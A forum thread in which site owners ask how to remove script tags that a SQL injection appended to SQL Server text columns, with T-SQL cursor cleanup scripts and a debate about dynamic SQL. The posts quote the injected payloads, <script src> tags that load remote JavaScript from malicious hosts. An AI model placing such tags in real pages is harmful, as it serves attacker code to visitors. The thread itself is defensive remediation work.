I got a SQL injection hack that put this after each description in my database: <script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script>

Any idea how to remove it without deleting the description?

Here is what I have:

HIM PORTRAIT SHIRT<script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script>

Here is what I need:

HIM PORTRAIT SHIRT

3000 items/rows need to be cleaned up, too much to do manually!!!


I found this, but the column is in text.

DECLARE @sql NVARCHAR(4000)
DECLARE @InsertedValue NVARCHAR(1000)
-- the exact string to strip, e.g. the two <script> tags shown in the first post
SET @InsertedValue = 'The Script tags which were inserted'
DECLARE cur CURSOR FOR
    -- build one UPDATE per character column of every user table;
    -- convert() is needed because replace() rejects text/ntext arguments
    select 'update [' + sysusers.name + '].[' + sysobjects.name + ']
        set [' + syscolumns.name + '] = replace(convert(nvarchar(max), [' + syscolumns.name + ']), ''' + @InsertedValue + ''', '''')'
    from syscolumns
    join sysobjects on syscolumns.id = sysobjects.id
        and sysobjects.xtype = 'U'
    join sysusers on sysobjects.uid = sysusers.uid
    -- 35 text, 99 ntext, 167 varchar, 175 char, 231 nvarchar, 239 nchar
    where syscolumns.xtype in (35, 99, 167, 175, 231, 239)
OPEN cur
FETCH NEXT FROM cur INTO @sql
WHILE @@FETCH_STATUS = 0
BEGIN
    exec (@sql)
    FETCH NEXT FROM cur INTO @sql
END
CLOSE cur
DEALLOCATE cur

This worked:

use [Your database name]   -- the affected database

DECLARE @T varchar(255), @C varchar(255);
-- every ntext (99), text (35), nvarchar (231) and varchar (167) column of every user table
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  -- Reverse the value and look for "tpircs<" (the reversed "<script"): the match
  -- position locates the LAST <script tag, and left() keeps only the text before it.
  -- With stacked tags, run the script again until no rows are updated. Values are
  -- converted to varchar(8000), so anything longer is truncated. The WHERE clause
  -- matters: without a "<script" match patindex() returns 0 and six characters
  -- would be cut from clean rows.
  EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
            convert(varchar(8000), ['+@C+']),
            len(convert(varchar(8000), ['+@C+'])) - 6 -
            patindex(''%tpircs<%'',
                      reverse(convert(varchar(8000), ['+@C+'])))
            )
      where ['+@C+'] like ''%<script%'''
      );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;

CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

Dynamic SQL is very risky!!

I'm sorry, but this is totally not true, because it depends on the person who wrote it.

In SQL you should never, ever do concatenation to make queries; you should use parameterized queries,
and if the columns or the tables are dynamic you should use quotename().
SQL injection has nothing to do with dynamic SQL itself; it all depends on how you wrote it.
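As an added example (not code from the thread): the same column-by-column cleanup the posted cursor scripts perform, written the way this reply recommends, with table and column names escaped by quotename() and the injected string passed to sp_executesql as a parameter rather than concatenated. It assumes SQL Server 2008 or later and uses the payload from the first post; the @dryrun switch and the sys.* catalog views are my additions.

```sql
-- Added example, not from the thread. Assumes SQL Server 2008+.
-- Exact injected string from the first post; REPLACE removes every copy, so
-- stacked tags go in one pass and text that merely mentions "<script" is untouched.
DECLARE @payload nvarchar(4000) = N'<script src="http://b.adserv.cn/E/J.JS"></script>'
                                + N'<script src="http://b.rtbn2.cn/E/J.JS"></script>';
DECLARE @dryrun bit = 1;  -- 1: only count affected rows; 0: perform the UPDATE

DECLARE @schema sysname, @table sysname, @column sysname,
        @sql nvarchar(max), @hits int;

-- Character and legacy text/ntext columns of every user table
DECLARE col_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT s.name, t.name, c.name
    FROM sys.tables t
    JOIN sys.schemas s ON s.schema_id = t.schema_id
    JOIN sys.columns c ON c.object_id = t.object_id
    JOIN sys.types ty ON ty.user_type_id = c.user_type_id
    WHERE ty.name IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext');

OPEN col_cur;
FETCH NEXT FROM col_cur INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers cannot be parameters, so QUOTENAME() bracket-escapes them;
    -- the payload itself is never concatenated into the statement text.
    SET @sql = N'SELECT @n = COUNT(*) FROM ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE CHARINDEX(@p, CONVERT(nvarchar(max), ' + QUOTENAME(@column) + N')) > 0;';
    EXEC sp_executesql @sql, N'@p nvarchar(4000), @n int OUTPUT',
                       @p = @payload, @n = @hits OUTPUT;

    IF @hits > 0
    BEGIN
        PRINT CAST(@hits AS varchar(10)) + ' row(s) in '
              + QUOTENAME(@schema) + '.' + QUOTENAME(@table) + '.' + QUOTENAME(@column);
        IF @dryrun = 0
        BEGIN
            SET @sql = N'UPDATE ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
                     + N' SET ' + QUOTENAME(@column) + N' = REPLACE(CONVERT(nvarchar(max), '
                     + QUOTENAME(@column) + N'), @p, N'''')'
                     + N' WHERE CHARINDEX(@p, CONVERT(nvarchar(max), ' + QUOTENAME(@column) + N')) > 0;';
            EXEC sp_executesql @sql, N'@p nvarchar(4000)', @p = @payload;
        END
    END
    FETCH NEXT FROM col_cur INTO @schema, @table, @column;
END
CLOSE col_cur;
DEALLOCATE col_cur;
```

Run it once with @dryrun = 1 against a backup and compare the printed counts with what you expect before setting @dryrun = 0.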


You don't avoid injection just from the application; dynamic SQL lets any code run against the SP, plus it's not maintainable, and this is the big risk in business application development. I'm sure that for every scenario where you think "I must use dynamic SQL", there's a better solution that doesn't use it.


I have this SQL injection on my database:
</title><script src=http://google-stats49.info/ur.php></script>
I want to remove it; it has affected almost all the tables.
Please let me know how this can be done. Thanks.

Removing it manually will take lots of time.
Please let me know.
I would also like to know how to stop further attacks.
Thanks


I have this attack on my database:
</title><script src=http://google-stats49.info/ur.php></script>

Please let me know what the code is and how to run it on Enterprise Edition.


How did you run this? Please let me know how to run it in SQL Enterprise Manager.
I have a similar attack that I would like to remove from my database too.
Looking forward to hearing from you.
Thanks
